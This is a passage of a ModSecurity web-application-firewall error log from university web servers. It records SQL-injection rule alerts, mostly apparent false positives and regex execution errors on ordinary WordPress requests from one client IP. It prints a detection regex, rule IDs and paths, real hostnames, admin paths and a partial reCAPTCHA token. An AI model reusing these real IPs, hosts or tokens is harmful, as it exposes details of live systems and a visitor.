[\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VwsCo-f0AAPbOKYgAAAAG"]
[Tue Aug 29 09:20:21.553083 2023] [:error] [pid 62955] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:g-recaptcha-response. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:g-recaptcha-response: 03ADUVZwCllgCn4UCghwmG4vyeIdN8_gBJekOm1BPhrhz1VsfSS9fhXLN7Wm0Rz5kQc4KNVmLDsBlfTFt1hwtVwi5hH-5kJIl1FyRM9-IRY7Tax9HFqadZWwF0afcmlcovtpuwL2Fd9JpMHZ88n_83KqrmuqnYm7afayqGtjW0AcFACBnWcC6WxLpqhE7NRfng_2Ja-ZcNF5TQku-5kD_bAtDpGEgDEt2rqdeaDGa_zUY1aWBeImf1R-ZsP6LLbmPLyUkyNv_xNy_hJm2bnneYA_NclTKIBh4lNjAUg7j9VcN9q6deXU9ebwMuIc6EXom_vsgrB3lkPIZ0G_mPfyH1sRLXSaDT5DM0ewu5Uj_pyFE_kcnDpcJ62iY0P-zIcQmrwEJyfgO_ekXNM8s_V0ABKzGenEjYAbMHrbtp3cRKniwml7JgcOgJg-x6K_NxCU6Xr02..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [t [hostname "ft.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO1V5cCo-f0AAPXrJYUAAAAK"]
[Tue Aug 29 09:26:38.668604 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c60b85d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO1XXsCo-f0AAPgD0bUAAAAO"]
[Tue Aug 29 09:26:39.042566 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO1XX8Co-f0AAPgD0bYAAAAO"]
[Tue Aug 29 09:26:39.202275 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/404"] [unique_id "ZO1XX8Co-f0AAPgD0bcAAAAO"]
[Tue Aug 29 09:26:39.504634 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/css/admin-bar.min.css"] [unique_id "ZO1XX8Co-f0AAPgD0bgAAAAO"]
[Tue Aug 29 09:26:39.507626 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/css/dist/block-library/style.min.css"] [unique_id "ZO1XX8Co-f0AAPgLalQAAAAJ"]
[Tue Aug 29 09:26:39.516430 2023] [:error] [pid 63492] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/css/YouTubePopUp.css"] [unique_id "ZO1XX8Co-f0AAPgEgvcAAAAZ"]
[Tue Aug 29 09:26:39.516496 2023] [:error] [pid 63492] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/css/YouTubePopUp.css"] [unique_id "ZO1XX8Co-f0AAPgEgvcAAAAZ"]
[Tue Aug 29 09:26:39.518092 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/css/vp-close-icon/close-button-icon.css"] [unique_id "ZO1XX8Co-f0AAPgK@HcAAAAI"]
[Tue Aug 29 09:26:39.518164 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/css/vp-close-icon/close-button-icon.css"] [unique_id "ZO1XX8Co-f0AAPgK@HcAAAAI"]
[Tue Aug 29 09:26:39.519304 2023] [:error] [pid 63503] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/style.css"] [unique_id "ZO1XX8Co-f0AAPgPY5gAAAAK"]
[Tue Aug 29 09:26:39.525457 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/js/magnific-popup/magnific-popup.min.css"] [unique_id "ZO1XX8Co-f0AAPgLalUAAAAJ"]
[Tue Aug 29 09:26:39.530112 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/fontawesome/css/font-awesome.min.css"] [unique_id "ZO1XX8Co-f0AAPgD0bkAAAAO"]
[Tue Aug 29 09:26:39.532709 2023] [:error] [pid 63492] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/js/YouTubePopUp.jquery.js"] [unique_id "ZO1XX8Co-f0AAPgEgvgAAAAZ"]
[Tue Aug 29 09:26:39.532767 2023] [:error] [pid 63492] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/js/YouTubePopUp.jquery.js"] [unique_id "ZO1XX8Co-f0AAPgEgvgAAAAZ"]
[Tue Aug 29 09:26:39.533345 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/js/YouTubePopUp.js"] [unique_id "ZO1XX8Co-f0AAPgK@HgAAAAI"]
[Tue Aug 29 09:26:39.533403 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/js/YouTubePopUp.js"] [unique_id "ZO1XX8Co-f0AAPgK@HgAAAAI"]
[Tue Aug 29 09:26:39.535544 2023] [:error] [pid 63503] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/hoverintent-js.min.js"] [unique_id "ZO1XX8Co-f0AAPgPY5kAAAAK"]
[Tue Aug 29 09:26:39.540183 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/admin-bar.min.js"] [unique_id "ZO1XX8Co-f0AAPgLalYAAAAJ"]
[Tue Aug 29 09:26:39.543177 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/js/jquery.bxslider.min.js"] [unique_id "ZO1XX8Co-f0AAPgD0boAAAAO"]
[Tue Aug 29 09:26:39.549552 2023] [:error] [pid 63492] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/js/sticky/jquery.sticky.min.js"] [unique_id "ZO1XX8Co-f0AAPgEgvkAAAAZ"]
[Tue Aug 29 09:26:39.550845 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/js/magnific-popup/jquery.magnific-popup.min.js"] [unique_id "ZO1XX8Co-f0AAPgK@HkAAAAI"]
[Tue Aug 29 09:26:39.552180 2023] [:error] [pid 63503] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/js/navigation.min.js"] [unique_id "ZO1XX8Co-f0AAPgPY5oAAAAK"]
[Tue Aug 29 09:26:39.556465 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/js/fitvids/jquery.fitvids.min.js"] [unique_id "ZO1XX8Co-f0AAPgD0bsAAAAO"]
[Tue Aug 29 09:26:39.560779 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/js/skip-link-focus-fix.min.js"] [unique_id "ZO1XX8Co-f0AAPgLalcAAAAJ"]
[Tue Aug 29 09:26:39.568738 2023] [:error] [pid 63492] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/js/colormag-custom.min.js"] [unique_id "ZO1XX8Co-f0AAPgEgvoAAAAZ"]
[Tue Aug 29 09:26:39.569148 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/wp-embed.min.js"] [unique_id "ZO1XX8Co-f0AAPgK@HoAAAAI"]
[Tue Aug 29 09:26:40.056445 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/dark.css"] [unique_id "ZO1XYMCo-f0AAPgQWqkAAAAM"]
[Tue Aug 29 09:26:40.433544 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/fontawesome/fonts/fontawesome-webfont.woff2"] [unique_id "ZO1XYMCo-f0AAPgQWqoAAAAM"]
[Tue Aug 29 09:26:47.221902 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/profile.php"] [unique_id "ZO1XZ8Co-f0AAPgW9woAAAAU"]
[Tue Aug 29 09:26:47.221990 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/profile.php"] [unique_id "ZO1XZ8Co-f0AAPgW9woAAAAU"]
[Tue Aug 29 09:26:47.783890 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/easy-hide-login/style.css"] [unique_id "ZO1XZ8Co-f0AAPgD0bwAAAAO"]
[Tue Aug 29 09:26:47.783960 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/easy-hide-login/style.css"] [unique_id "ZO1XZ8Co-f0AAPgD0bwAAAAO"]
[Tue Aug 29 09:26:47.784911 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/load-styles.php"] [unique_id "ZO1XZ8Co-f0AAPgW9wsAAAAU"]
[Tue Aug 29 09:26:47.784977 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/load-styles.php"] [unique_id "ZO1XZ8Co-f0AAPgW9wsAAAAU"]
[Tue Aug 29 09:26:47.796328 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/disable-comments/assets/css/notice.css"] [unique_id "ZO1XZ8Co-f0AAPgQWqsAAAAM"]
[Tue Aug 29 09:26:47.796392 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/disable-comments/assets/css/notice.css"] [unique_id "ZO1XZ8Co-f0AAPgQWqsAAAAM"]
[Tue Aug 29 09:26:47.796988 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/google-captcha/css/admin_page.css"] [unique_id "ZO1XZ8Co-f0AAPgK@HsAAAAI"]
[Tue Aug 29 09:26:47.797049 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/google-captcha/css/admin_page.css"] [unique_id "ZO1XZ8Co-f0AAPgK@HsAAAAI"]
[Tue Aug 29 09:26:47.800323 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/admin/css/meta-row-style.css"] [unique_id "ZO1XZ8Co-f0AAPgLalgAAAAJ"]
[Tue Aug 29 09:26:47.800385 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/admin/css/meta-row-style.css"] [unique_id "ZO1XZ8Co-f0AAPgLalgAAAAJ"]
[Tue Aug 29 09:26:47.801582 2023] [:error] [pid 63512] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/limit-login-attempts-reloaded/assets/css/limit-login-attempts.css"] [unique_id "ZO1XZ8Co-f0AAPgY6nUAAAAW"]
[Tue Aug 29 09:26:47.801647 2023] [:error] [pid 63512] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/limit-login-attempts-reloaded/assets/css/limit-login-attempts.css"] [unique_id "ZO1XZ8Co-f0AAPgY6nUAAAAW"]
[Tue Aug 29 09:26:47.815393 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/tinymce/css/tinymce.css"] [unique_id "ZO1XZ8Co-f0AAPgD0b0AAAAO"]
[Tue Aug 29 09:26:47.815454 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/tinymce/css/tinymce.css"] [unique_id "ZO1XZ8Co-f0AAPgD0b0AAAAO"]
[Tue Aug 29 09:26:47.818843 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZO1XZ8Co-f0AAPgQWqwAAAAM"]
[Tue Aug 29 09:26:47.821170 2023] [:error] [pid 63512] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/mediaelement/wp-mediaelement.min.css"] [unique_id "ZO1XZ8Co-f0AAPgY6nYAAAAW"]
[Tue Aug 29 09:26:47.826488 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/imgareaselect/imgareaselect.css"] [unique_id "ZO1XZ8Co-f0AAPgK@HwAAAAI"]
[Tue Aug 29 09:26:47.831376 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/inc/admin/css/admin.css"] [unique_id "ZO1XZ8Co-f0AAPgD0b4AAAAO"]
[Tue Aug 29 09:26:47.833566 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/inc/admin/css/admin.css"] [unique_id "ZO1XZ8Co-f0AAPgLalkAAAAJ"]
[Tue Aug 29 09:26:47.841433 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/google-captcha/bws_menu/css/jquery-ui-styles/1.12.1/jquery-ui.css"] [unique_id "ZO1XZ8Co-f0AAPgQWq0AAAAM"]
[Tue Aug 29 09:26:47.841496 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/google-captcha/bws_menu/css/jquery-ui-styles/1.12.1/jquery-ui.css"] [unique_id "ZO1XZ8Co-f0AAPgQWq0AAAAM"]
[Tue Aug 29 09:26:47.842797 2023] [:error] [pid 63512] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/google-captcha/bws_menu/css/general_style.css"] [unique_id "ZO1XZ8Co-f0AAPgY6ncAAAAW"]
[Tue Aug 29 09:26:47.842856 2023] [:error] [pid 63512] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/google-captcha/bws_menu/css/general_style.css"] [unique_id "ZO1XZ8Co-f0AAPgY6ncAAAAW"]
[Tue Aug 29 09:26:47.848260 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/load-scripts.php"] [unique_id "ZO1XZ8Co-f0AAPgK@H0AAAAI"]
[Tue Aug 29 09:26:47.848321 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/load-scripts.php"] [unique_id "ZO1XZ8Co-f0AAPgK@H0AAAAI"]
[Tue Aug 29 09:26:47.849794 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/disable-xml-rpc-api/admin/admin.js"] [unique_id "ZO1XZ8Co-f0AAPgLaloAAAAJ"]
[Tue Aug 29 09:26:47.849860 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/disable-xml-rpc-api/admin/admin.js"] [unique_id "ZO1XZ8Co-f0AAPgLaloAAAAJ"]
[Tue Aug 29 09:26:47.851633 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/google-captcha/bws_menu/js/general_script.js"] [unique_id "ZO1XZ8Co-f0AAPgD0b8AAAAO"]
[Tue Aug 29 09:26:47.851690 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/google-captcha/bws_menu/js/general_script.js"] [unique_id "ZO1XZ8Co-f0AAPgD0b8AAAAO"]
